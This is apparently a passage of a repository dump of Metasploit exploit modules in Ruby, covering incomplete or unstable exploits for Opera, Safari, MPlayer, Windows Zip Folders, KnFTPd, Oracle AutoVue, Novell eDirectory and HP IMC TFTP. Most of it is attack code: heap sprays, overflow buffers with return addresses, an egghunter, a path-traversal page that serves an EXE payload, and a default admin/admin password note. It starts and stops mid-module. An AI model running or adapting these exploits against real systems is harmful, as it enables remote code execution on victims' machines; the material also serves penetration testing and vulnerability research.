32 | Unforatunately, I have not been able to achieve code exec yet :-/ 33 | }, 34 | 'License' => MSF_LICENSE, 35 | 'Author' => [ 'jduck' ], 36 | 'Version' => '$Revision$', 37 | 'References' => 38 | [ 39 | [ 'URL', 'http://www.hack0wn.com/view.php?xroot=672.0&cat=exploits' ], 40 | [ 'URL', 'http://secunia.com/blog/86/' ], 41 | [ 'URL', 'http://my.opera.com/securitygroup/blog/2010/03/09/the-malformed-content-length-header-security-issue' ] 42 | ], 43 | 'Payload' => 44 | { 45 | 'ExitFunc' => 'process', 46 | 'Space' => 2048, 47 | 'BadChars' => "", 48 | 'DisableNops' => true, 49 | }, 50 | 'Targets' => 51 | [ 52 | [ 'Opera 10.50 on Windows XP SP3', 53 | { 54 | 'Platform' => 'win', 55 | 'Arch' => ARCH_X86, 56 | 'Ret' => 0x0c0c0c0c, 57 | 'BlockLen' => 0x60000, 58 | 'Containers' => 800, 59 | } 60 | ], 61 | ], 62 | 'DisclosureDate' => 'Mar 03 2010', 63 | 'DefaultTarget' => 0 64 | })) 65 | end 66 | 67 | def on_request_uri(cli, request) 68 | print_status("Got request for: #{request.uri}") 69 | #print_status(request.inspect) 70 | 71 | # Re-generate the payload 72 | #return if ((p = regenerate_payload(cli)) == nil) 73 | 74 | 75 | # Send the trigger when requested.. 76 | if (request.uri =~ /boom$/) 77 | len = rand(0x7000) 78 | # below will force a crash every time 79 | #len = 0x0c0c0c0c 80 | print_status("Using length: %d" % len) 81 | 82 | bignum = 11111111111111111111 - 3047977415 83 | bignum += len 84 | 85 | content = "A" * 10240 86 | 87 | response = "" 88 | response << "HTTP/#{request.proto} 200 OK\r\n" 89 | response << "Content-Type: text/html\r\n" 90 | response << "Content-Length: #{bignum}\r\n" 91 | response << "\r\n" 92 | response << content 93 | 94 | print_status("Sending #{self.name} trigger to #{cli.peerhost}:#{cli.peerport}...") 95 | cli.put(response) 96 | 97 | return 98 | end 99 | 100 | 101 | # Otherwise, setup the heap to get pwnt... 
102 | print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...") 103 | html = %Q| 104 | 105 | 106 | 131 | 132 | 133 | 134 | 135 | | 136 | 137 | trigger_url = get_resource() + '/boom' 138 | html.gsub!(/REPLACE_ME/, trigger_url) 139 | 140 | send_response_html(cli, html) 141 | 142 | handler(cli) 143 | end 144 | 145 | end 146 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/browser/safari_feedurl.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | 15 | 16 | class Metasploit3 < Msf::Exploit::Remote 17 | 18 | include Msf::Exploit::Remote::HttpServer::HTML 19 | include Msf::Exploit::Remote::BrowserAutopwn 20 | autopwn_info({ 21 | :ua_name => HttpClients::SAFARI, 22 | :javascript => true, 23 | :rank => NormalRanking, # reliable memory corruption 24 | :vuln_test => nil, 25 | }) 26 | 27 | def initialize(info = {}) 28 | super(update_info(info, 29 | 'Name' => '[INCOMPLETE] Safari libxml2 feed:// URL Heap Overflow', 30 | 'Description' => %q{ }, 31 | 'License' => BSD_LICENSE, 32 | 'Author' => [ 'egypt' ], 33 | 'Version' => '$Revision$', 34 | 'References' => 35 | [ 36 | ['BID', '31126'], 37 | ['CVE', '2008-3529'], 38 | ], 39 | 'Payload' => 40 | { 41 | 'Space' => 1024, 42 | 'BadChars' => "\x00", 43 | 'DisableNops' => true, 44 | }, 45 | 'Targets' => 46 | [ 47 | # Target 0: Automatic 48 | [ 49 | 'Windows Safari 3.2.1 via libxml2.dll', 50 | { 51 | # Addresses must be alphanumeric ascii 52 | 'Platform' => [ 'win' ], 53 | #'Ret' => 0x62306e38, # call eax; libxml2.dll 54 | #'Ret' => 0x62317666, # call ebx; 
libxml2.dll 55 | #'Ret' => 0x62315233, # call ecx; libxml2.dll 56 | #'Ret' => 0x62306e55, # call edx; libxml2.dll 57 | #'Ret' => 0x62334f4c, # call edi; libxml2.dll 58 | 'Ret' => 0x62353068, # call esi; libxml2.dll 59 | #'Ret' => 0x62314169, # call ebp; libxml2.dll 60 | #'Where' => 0x30313233, # Need a pointer that gets called 61 | 'Where' => 0x77ed73b4, # Need a pointer that gets called 62 | }, 63 | ], 64 | ], 65 | 'DefaultTarget' => 0)) 66 | end 67 | 68 | def on_request_uri(cli, request) 69 | # Re-generate the payload 70 | return if ((p = regenerate_payload(cli)) == nil) 71 | 72 | headers = { 73 | 'Cache-control' => 'must-revalidate', 74 | 'Expires' => '0' 75 | } 76 | case request.uri 77 | when get_resource() 78 | print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 79 | 80 | content = "" 81 | content << "" 84 | content << "" 85 | when /feed/ 86 | print_status("Sending evil feed to #{cli.peerhost}:#{cli.peerport}...") 87 | 88 | sets = [("A".."Z").to_a.join, ("a".."j").to_a.join, ("k".."z").to_a.join] 89 | pattern = Rex::Text.pattern_create(1000, sets) 90 | 91 | pattern[207,4] = [target.ret].pack("V") 92 | pattern[211,4] = [target['Where']].pack("V") 93 | # For debug heap 94 | #pattern[223,4] = [target.ret].pack("V") 95 | #pattern[227,4] = [0x78787878].pack("V") 96 | 97 | content = '' + "\n" + 98 | '' + "\n" + 100 | ' ]>\n" + 103 | 'text' + "\n" 106 | headers["Content-Type"] = "text/xml" 107 | end 108 | send_response(cli, content, headers) 109 | 110 | # Handle the payload 111 | handler(cli) 112 | 113 | end 114 | 115 | end 116 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/browser/safari_float.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. 
Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | 15 | 16 | class Metasploit3 < Msf::Exploit::Remote 17 | 18 | include Msf::Exploit::Remote::HttpServer::HTML 19 | 20 | #include Msf::Exploit::Remote::BrowserAutopwn 21 | #autopwn_info({ 22 | # :ua_name => HttpClients::SAFARI, 23 | # :javascript => true, 24 | # :rank => NormalRanking, # reliable memory corruption 25 | # :vuln_test => nil, 26 | #}) 27 | 28 | def initialize(info = {}) 29 | super(update_info(info, 30 | 'Name' => '[INCOMPLETE] Safari Floating Point Number Parsing Overflow', 31 | 'Description' => %q{ }, 32 | 'License' => BSD_LICENSE, 33 | 'Author' => [ 'egypt' ], 34 | 'Version' => '$Revision$', 35 | 'References' => 36 | [ 37 | #['BID', ''], 38 | #['CVE', ''], 39 | ], 40 | 'Platform' => [ 'win' ], 41 | 'Payload' => 42 | { 43 | 'Space' => 1024, 44 | 'BadChars' => "\x00", 45 | 'DisableNops' => true, 46 | }, 47 | 'Targets' => 48 | [ 49 | # Target 0: Automatic 50 | [ 51 | 'Windows Safari 3.2.1 via libxml2.dll', 52 | { 53 | 'Ret' => 0xdeadbeef, # call eax; libxml2.dll 54 | }, 55 | ], 56 | ], 57 | 'DefaultTarget' => 0)) 58 | end 59 | 60 | def on_request_uri(cli, request) 61 | # Re-generate the payload 62 | p = regenerate_payload(cli) 63 | if (p == nil) 64 | send_not_found(cli) 65 | return 66 | end 67 | 68 | headers = { 69 | 'Cache-control' => 'must-revalidate', 70 | 'Expires' => '0' 71 | } 72 | case request.uri 73 | when get_resource() 74 | print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 75 | 76 | num = "1"*3658 77 | content = "" 78 | content << "" 81 | content << "" 82 | end 83 | send_response(cli, content, headers) 84 | 85 | # Handle the payload 86 | handler(cli) 87 | 88 | end 89 | 90 | end 91 | -------------------------------------------------------------------------------- 
/modules/exploits/unstable/incomplete/windows/fileformat/mplayer_lite_m3u.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = NormalRanking 16 | 17 | include Msf::Exploit::FILEFORMAT 18 | 19 | def initialize(info = {}) 20 | super(update_info(info, 21 | 'Name' => 'MPlayer Lite r33064 Buffer Overflow', 22 | 'Description' => %q{ 23 | This module exploits a buffer overflow in MPlayer Lite r33064. When 24 | the application is used to import a specially crafted m3u file, a buffer overflow occurs 25 | allowing arbitrary code execution. 26 | }, 27 | 'License' => MSF_LICENSE, 28 | 'Author' => 29 | [ 30 | 'C4SS!0 And h1ch4m', # Original Exploit 31 | 'SmilingWolf' # MSF Module 32 | ], 33 | 'Version' => '$Revision$', 34 | 'References' => 35 | [ 36 | [ 'BID', '46926'], 37 | [ 'URL', 'http://www.exploit-db.com/exploits/17013/' ], 38 | ], 39 | 'DefaultOptions' => 40 | { 41 | 'EXITFUNC' => 'seh', 42 | 'DisablePayloadHandler' => 'true', 43 | }, 44 | 'Payload' => 45 | { 46 | 'Space' => 1000, 47 | 'BadChars' => "\x00\x0d\x0a\x26\x2f\x5c\x3e\x3f" 48 | }, 49 | 'Platform' => 'win', 50 | 'Targets' => 51 | [ 52 | [ 'Windows Universal', { 'Ret' => 0x6B04FCDE, 'Offset' => 5152 } ], # p/p/r in MPlayer.exe 53 | ], 54 | 'Privileged' => false, 55 | 'DisclosureDate' => 'Mar 19 2011', 56 | 'DefaultTarget' => 0)) 57 | 58 | register_options( 59 | [ 60 | OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']), 61 | ], self.class) 62 | 63 | end 64 | 65 | def exploit 66 | 67 | sploit = "\x90" * 100 68 | sploit << payload.encoded 69 | 70 | sploit2 = "\x41" * 
(5152-sploit.length) 71 | sploit2 << "\xeb\x0f\xcc\xcc" 72 | sploit2 << [target.ret].pack('V') 73 | sploit2 << "\x90" * 15 74 | sploit2 << "\xE9\xD4\xEB\xFF\xFF" 75 | sploit2 << "\x90" * 400 76 | filesploit = sploit + sploit2 77 | 78 | print_status("Creating '#{datastore['FILENAME']}' file ...") 79 | 80 | file_create('http:// ' + filesploit) 81 | 82 | end 83 | 84 | end 85 | 86 | =begin 87 | http://dev.metasploit.com/redmine/issues/4097 88 | =end 89 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/fileformat/ms04_034_zip_folders.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | require 'rex/zip' 14 | 15 | 16 | class Metasploit3 < Msf::Exploit::Remote 17 | Rank = GreatRanking 18 | 19 | include Msf::Exploit::FILEFORMAT 20 | include Msf::Exploit::Remote::Seh 21 | 22 | def initialize(info = {}) 23 | super(update_info(info, 24 | 'Name' => '[INCOMPLETE] Windows Zip File Handling Stack Buffer Overflow', 25 | 'Description' => %q{ 26 | This module exploits a stack-based buffer overflow vulnerability in 27 | Windows Zip Folders prior to MS04-034. 28 | 29 | In order for the command to be executed, an attacker must convince someone to 30 | open a specially crafted zip file and ?? 31 | 32 | By doing so, an attacker can execute arbitrary 33 | code as the victim user. 
34 | }, 35 | 'License' => MSF_LICENSE, 36 | 'Author' => 37 | [ 38 | 'Tarako', 39 | 'jduck' 40 | ], 41 | 'Version' => '$Revision$', 42 | 'References' => 43 | [ 44 | [ 'CVE', '2004-0575' ], 45 | [ 'MSB', 'MS04-034' ], 46 | [ 'OSVDB', '10695' ], 47 | [ 'OSVDB', '12252' ], 48 | [ 'BID', '34044' ], 49 | [ 'URL', 'http://research.eeye.com/html/advisories/published/AD20041012A.html' ] 50 | ], 51 | 'Platform' => [ 'win' ], 52 | 'Payload' => 53 | { 54 | 'Space' => 0x800, 55 | 'BadChars' => '' 56 | }, 57 | 'Targets' => 58 | [ 59 | ['Windows Universal', { 'Ret' => 0x41424344 }], # p/p/r 60 | ], 61 | 'DisclosureDate' => 'Oct 12 2004', 62 | 'DefaultTarget' => 0)) 63 | 64 | register_options( 65 | [ 66 | OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']), 67 | ], self.class) 68 | 69 | end 70 | 71 | 72 | def exploit 73 | 74 | # XXX: Unable to trigger on XP SP1 75 | fname = Rex::Text.pattern_create(0x9200) 76 | 77 | content = rand_text_alphanumeric(rand(2048)) 78 | 79 | zip = Rex::Zip::Archive.new 80 | xtra = [0xdac0ffee].pack('V') 81 | comment = [0xbadc0ded].pack('V') 82 | zip.add_file(fname, content, xtra, comment) 83 | 84 | # Create the file 85 | print_status("Creating '#{datastore['FILENAME']}' file...") 86 | 87 | file_create(zip.pack) 88 | end 89 | 90 | end 91 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/ftp/knftp.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 
9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = NormalRanking 16 | 17 | include Msf::Exploit::Remote::Ftp 18 | include Msf::Exploit::Remote::Egghunter 19 | 20 | def initialize(info = {}) 21 | super(update_info(info, 22 | 'Name' => 'KnFTPd 1.0.0 Server Remote Buffer Overflow Vulnerability', 23 | 'Description' => %q{ 24 | This module exploits a vulnerability in the KnFTP FTP service without 25 | authenticated required, A long FTP command value will result in a 26 | buffer overflow. This Allows you to gain control as the user who 27 | started the application. 28 | 29 | }, 30 | 'License' => MSF_LICENSE, 31 | 'Author' => 32 | [ 33 | 'Qixu Liu', # Original discovery 34 | 'Blake', # Orginal exploit 35 | 'TecR0c ', # Metasploit module 36 | ], 37 | 'Version' => '$Revision$', 38 | 'References' => 39 | [ 40 | [ 'URL', 'http://secunia.com/advisories/45907' ], 41 | [ 'URL', 'http://www.exploit-db.com/exploits/17819/' ], 42 | [ 'URL', 'http://www.exploit-db.com/exploits/17856/' ], 43 | ], 44 | 'DefaultOptions' => 45 | { 46 | 'EXITFUNC' => 'process', 47 | 'DisablePayloadHandler' => 'false', 48 | }, 49 | 'Platform' => 'win', 50 | 'Payload' => 51 | { 52 | 'BadChars' => "\x00", 53 | 'InitialAutoRunScript' => 'migrate -f', 54 | }, 55 | 56 | 'Targets' => 57 | [ 58 | [ 'Windows XP SP3 English', 59 | { 60 | 'Ret' => 0x662eb24f, 61 | 'Offset' => 284 62 | } 63 | ], # JMP ESP - hnetcfg.dll 64 | ], 65 | 'Privileged' => false, 66 | 'DisclosureDate' => 'Sep 02 2011', 67 | 'DefaultTarget' => 0)) 68 | 69 | end 70 | 71 | def exploit 72 | 73 | # Used egghunter since payload space between start of buffer and EIP is to small for 74 | # meterpreter payload 75 | hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true }) 76 | 77 | buffer = egg 78 | buffer << rand_text_alpha(target['Offset']-buffer.length) 79 | buffer << [target.ret].pack('V') 80 | buffer << make_nops(4) 81 | buffer 
<< hunter 82 | 83 | # If you overwrite SEH it only adds 65 bytes past EIP 84 | 85 | print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}") 86 | 87 | connect 88 | send_cmd(['PASS', buffer], true) 89 | handler 90 | disconnect 91 | end 92 | end 93 | 94 | 95 | =begin 96 | http://dev.metasploit.com/redmine/issues/5471 97 | =end -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/http/oracle_autovue.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = GoodRanking 16 | 17 | include Msf::Exploit::Remote::HttpServer::HTML 18 | include Msf::Exploit::EXE 19 | 20 | def initialize(info={}) 21 | super(update_info(info, 22 | 'Name' => "Oracle AutoVue 20.0.1 SaveViewStateToFile Vulnerability", 23 | 'Description' => %q{Module Description}, 24 | 'License' => MSF_LICENSE, 25 | 'Version' => "$Revision$", 26 | 'Author' => 27 | [ 28 | 'rgod', #Initial discovery, poc 29 | 'sinn3r', #Metasploit 30 | ], 31 | 'References' => 32 | [ 33 | ['BID', '50321'], 34 | ['URL', 'http://www.exploit-db.com/exploits/18016/'] 35 | ], 36 | 'Payload' => 37 | { 38 | 'BadChars' => "", 39 | }, 40 | 'DefaultOptions' => 41 | { 42 | 'ExitFunction' => "none", 43 | 'InitialAutoRunScript' => 'migrate -f', 44 | }, 45 | 'Platform' => 'win', 46 | 'Targets' => 47 | [ 48 | [ 'Windows', {} ], 49 | ], 50 | 'Privileged' => false, 51 | 'DisclosureDate' => "Apr 1 2011", 52 | 'DefaultTarget' => 0)) 53 | end 54 | 55 | def on_request_uri(cli, request) 56 | #If the client isn't Win / IE, no point to continue 57 
| agent = request.headers['User-Agent'] 58 | if agent !~ /Windows NT \d\.\d/ or agent !~ /MSIE \d\.\d/ 59 | print_error("Target not supported: #{agent.to_s}") 60 | send_not_found(cli) 61 | return 62 | end 63 | 64 | print_status(request.uri) 65 | 66 | # Send our payload if requested 67 | if request.uri =~ /MicroStation\.dgn/ 68 | return if ((p = regenerate_payload(cli)) == nil) 69 | exe = generate_payload_exe({ :code => p.encoded }) 70 | print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") 71 | send_response(cli, exe, {'Content-Type' => 'application/octet-stream'}) 72 | return 73 | end 74 | 75 | # Get our server's IP 76 | if datastore['SRVHOST'] == '0.0.0.0' 77 | host_ip = Rex::Socket.source_address(cli.peerhost) 78 | else 79 | host_ip = datastore['SRVHOST'] 80 | end 81 | 82 | # Server's endpoint 83 | host = host_ip + ":" + datastore['SRVPORT'] 84 | 85 | src_path = "http://#{host}#{get_resource()}/MicroStation.dgn" 86 | 87 | js = <<-JS 88 | obj.SRC = "#{src_path}"; 89 | obj.RestoreViewStateFromFile("http://#{host}#{get_resource()}/sample.dmp"); 90 | for (i=0; i<6666; i++) { 91 | try { 92 | obj.SaveViewStateToFile("../../../../../../../../../../boot.ini"); 93 | } 94 | catch(e) { 95 | } 96 | } 97 | JS 98 | 99 | html = <<-HTML 100 | 101 | 102 | 103 | 106 | 107 | HTML 108 | 109 | print_status("Sending HTML to: #{cli.peerhost}:#{cli.peerport}...") 110 | send_response(cli, html, {'Content-Type' => 'text/html'}) 111 | end 112 | 113 | def exploit 114 | @payload_name = rand_text_alpha(5) + ".dgn" 115 | super 116 | end 117 | end 118 | 119 | =begin 120 | Testing version: 121 | Oracle AutoVue Electro-Mechanical Professional 20.0.2 Desktop Version 122 | Build 790: 2011-08-29 123 | 124 | Not vulnerable? 
125 | MD5 (AutoVueX.ocx) = eb32aa5068b843f8ebb4d4b83eb5e5ab 126 | SHA1(AutoVueX.ocx)= dce6f88870c8fe1ff7c50db50d4a3db4947cbdd4 127 | =end -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/misc/edirectory_dhost_module.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | 15 | 16 | class Metasploit3 < Msf::Exploit::Remote 17 | 18 | include Msf::Exploit::Remote::Tcp 19 | include Msf::Exploit::Remote::Seh 20 | 21 | def initialize(info = {}) 22 | super(update_info(info, 23 | 'Name' => '[INCOMPLETE] Novell eDirectory NDS DHOST Module Name Overflow', 24 | 'Description' => %q{ 25 | This module exploits a stack overflow in Novell eDirectory 8.8.5. 
26 | }, 27 | 'Author' => 'hdm', 28 | 'License' => MSF_LICENSE, 29 | 'Version' => '$Revision$', 30 | 'References' => 31 | [ 32 | 33 | ], 34 | 'DefaultOptions' => 35 | { 36 | 'EXITFUNC' => 'seh' 37 | }, 38 | 'Payload' => 39 | { 40 | 'Space' => 600, 41 | 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 42 | 'StackAdjustment' => -3500, 43 | }, 44 | 'Platform' => 'win', 45 | 'Targets' => 46 | [ 47 | [ 'Novell eDirectory 8.8.5', { 'Ret' => 0xcccccccc } ], # ntls.dll 48 | ], 49 | 50 | 'Privileged' => true, 51 | 52 | 'DisclosureDate' => 'Nov 10 2008', 53 | 54 | 'DefaultTarget' => 0)) 55 | 56 | register_options([ 57 | Opt::RPORT(8030), 58 | OptString.new('USERNAME', [true, "A valid username for the eDirectory server", "admin"]), 59 | OptString.new('PASSWORD', [true, "A valid password for the eDirectory server"]), 60 | OptBool.new('SSL', [true, 'Use SSL', true]) 61 | ], self.class) 62 | end 63 | 64 | def exploit 65 | 66 | print_status("Obtaining a session cookie from the server...") 67 | connect 68 | req = "GET /dhost/ HTTP/1.1\r\n" 69 | req << "Host: #{rhost}:#{rport}\r\n" 70 | req << "Connection: close\r\n\r\n" 71 | sock.put(req) 72 | res = sock.get_once(-1,5) 73 | disconnect 74 | 75 | cookie = nil 76 | if(res =~ /Set-Cookie:\s*([^\s]+)\s*/mi) 77 | cookie = $1 78 | cookie,junk = cookie.split(';') 79 | end 80 | 81 | if(not cookie) 82 | print_error("Could not read the cookie value from the eDirectory server") 83 | return 84 | end 85 | 86 | print_status("Authenticating to the server as #{datastore['USERNAME']}") 87 | 88 | connect 89 | data = "usr=#{Rex::Text.uri_encode(datastore['USERNAME'])}&pwd=#{Rex::Text.uri_encode(datastore['PASSWORD'])}&Login=Login" 90 | req = "POST /_LOGIN_SERVER_RSP_ HTTP/1.1\r\n" 91 | req << "Host: #{rhost}:#{rport}\r\n" 92 | req << "Content-Type: application/x-www-form-urlencoded\r\n" 93 | req << "Content-Length: #{data.length}\r\n" 94 | req << "Cookie: #{cookie}\r\n\r\n#{data}" 95 | 96 | sock.put(req) 97 | res = 
sock.get_once(-1, 5) 98 | disconnect 99 | 100 | if(res !~ /dhost/) 101 | print_status("Invalid login information") 102 | return 103 | end 104 | 105 | print_status("Triggering the overflow...") 106 | 107 | connect 108 | 109 | # Fails on 2003 SP2, SEH/STACK both blocked 110 | 111 | buff = ::Rex::Text.pattern_create(2000) 112 | # buff[1644,4] = [0x10020202].pack("V") 113 | 114 | req = "GET /dhost/modules?L\x3a#{buff} HTTP/1.1\r\n" 115 | req << "Host: #{rhost}:#{rport}\r\n" 116 | req << "Cookie: #{cookie}\r\n\r\n" 117 | sock.put(req) 118 | 119 | handler 120 | disconnect 121 | end 122 | 123 | end 124 | 125 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/tftp/hp_imc_err.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = NormalRanking 16 | 17 | include Msf::Exploit::Remote::Udp 18 | 19 | def initialize(info={}) 20 | super(update_info(info, 21 | 'Name' => "[INCOMPLETE] HP Intelligent Management Center tftpserver ERROR Vulnerability", 22 | 'Description' => %q{ 23 | This module exploits a vulnerability found on HP Intelligent Management Center's 24 | TFTP service. By either supplying a malformed DATA or ERROR TFTP packet, the process 25 | will copy the user input into a fixed-length buffer on the stack, which results in 26 | arbitrary code execution under the context of the SYSTEM user. 27 | 28 | Note: If the user input exceeds 1100 bytes, the vulnerable code won't trigger. 
Even if 29 | you're able to trigger it (send about 1000 bytes), overwrite the SEH, /GS is still 30 | enabled, and we don't seem to be raising an exception before @__security_check_cookie() 31 | is called (which leads to kernel32.TerminateProcess). Also, all loded modules are safeseh 32 | protected. Use an address outside the range of loaded modules, perhaps? 33 | 34 | The copying routine is at 0x405331 (XP SP3). 35 | }, 36 | 'License' => MSF_LICENSE, 37 | 'Version' => "$Revision$", 38 | 'Author' => 39 | [ 40 | 'sinn3r', #Metasploit 41 | ], 42 | 'References' => 43 | [ 44 | [ 'CVE', '2011-1852' ], 45 | [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-164/' ], 46 | [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02822750' ], 47 | ], 48 | 'Payload' => 49 | { 50 | 'Space' => 500, 51 | 'BadChars' => "\x00", 52 | 'StackAdjustment' => -3500, 53 | }, 54 | 'DefaultOptions' => 55 | { 56 | 'ExitFunction' => "seh", #none/process/seh 57 | }, 58 | 'Platform' => 'win', 59 | 'Targets' => 60 | [ 61 | [ 'Windows XP SP3', {'Ret'=>0x41414141} ], 62 | ], 63 | 'Privileged' => false, 64 | 'DisclosureDate' => "Apr 1 2011", 65 | 'DefaultTarget' => 0)) 66 | end 67 | 68 | def exploit 69 | print_status("Sending packet...") 70 | 71 | connect_udp 72 | 73 | #1 = Read; 2 = Write; 3 = Data; 4 = ACK; 5 = Err 74 | #http://www.freesoft.org/CIE/RFC/1350/5.htm 75 | 76 | #Initial packet. Probably don't need to use this. 
77 | =begin 78 | pkt = '' 79 | pkt << "\x00\x05" #Opcode 80 | pkt << "\x41"*4 #Filename 81 | pkt << "\x00" #Null byte terminator 82 | pkt << "netascii" #Mode 83 | pkt << "\x00" #Null byte terminator 84 | =end 85 | 86 | #Data packet 87 | data = '' 88 | data << "\x00\x03" #Opcode 89 | data << "\x00\x01" #Block number 90 | data << "\x41"*1000 #Data 91 | 92 | #Error packet 93 | err = '' 94 | err << "\x00\x05" #Opcode 95 | err << "\x00\x01" #Error code 96 | err << "\x41"*550 #Message 97 | err << "\x00" #Null byte terminator 98 | 99 | udp_sock.put(err) 100 | 101 | disconnect_udp 102 | end 103 | end 104 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/tftp/hp_imc_wrq.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = NormalRanking 16 | 17 | include Msf::Exploit::Remote::Udp 18 | include Msf::Exploit::EXE 19 | 20 | def initialize(info={}) 21 | super(update_info(info, 22 | 'Name' => "[INCOMPLETE] HP Intelligent Management Center tftpserver WRQ Remote Code Execution Vulnerability", 23 | 'Description' => %q{ 24 | The flaw exists within the tftpserver.exe component which listens by default on UDP port 69. 25 | When handling WRQ opcode types the server allows arbitrary file creation. Additionally, the 26 | server is configured to truncate/overwrite existing files. This process is owned by the SYSTEM 27 | user. A remote attacker can exploit this vulnerability to execute arbitrary code under the 28 | context of the SYSTEM user. 
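--- ZDI

        Note: By default, the files are stored in the follwoing folder. And this appears to be the only
        place to upload our stuff to (attempt to anywhere else will just give us an access denied, even
        if the location has full control set for 'Everyone'):
        C:\Program Files\iMC\server\tmp\

        tftpserver.exe is not in that directory.

        The only possible ways to gain code exeuction is under one of these:
        1. The user manually clicks on the binary
        2. C:\Program Files\iMC\server\tmp\ also happens to be a web directory

        ** Still investigating if it's possible to traverse our way out. Or at least use another vuln (
        if any) to execute our binry in C:\Program Files\iMC\server\tmp\ **

        Default password for Intelligent Management on port 8080: admin/admin
      },
      'License'        => MSF_LICENSE,
      'Version'        => "$Revision$",
      'Author'         =>
        [
          'sinn3r', #Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2011-1849' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-161/' ],
        ],
      'Payload'        =>
        {
          'Space'           => 500,
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500,
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "seh", #none/process/seh
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3', {'Ret'=>0x41414141} ],
        ],
      # NOTE(review): the description above says tftpserver.exe runs as SYSTEM;
      # if that holds, 'Privileged' should be true -- confirm on a live target.
      'Privileged'     => false,
      'DisclosureDate' => "Apr 1 2011",
      'DefaultTarget'  => 0))
  end

  # Uploads the payload EXE to the TFTP service: one WRQ, then lock-step DATA
  # blocks (RFC 1350). Every server reply is checked -- the WRQ must be answered
  # with ACK 0 and each DATA block with an ACK carrying the same block number --
  # so a refused write or a lost block aborts the transfer (with the server's
  # ERROR text when it sent one) instead of blindly pushing the remaining blocks.
  def exploit
    print_status("Generating payload...")
    exe = generate_payload_exe

    print_status("Sending packet...")

    connect_udp

    begin
      # TFTP opcodes: 1 = Read; 2 = Write; 3 = Data; 4 = ACK; 5 = Err
      # http://www.freesoft.org/CIE/RFC/1350/5.htm

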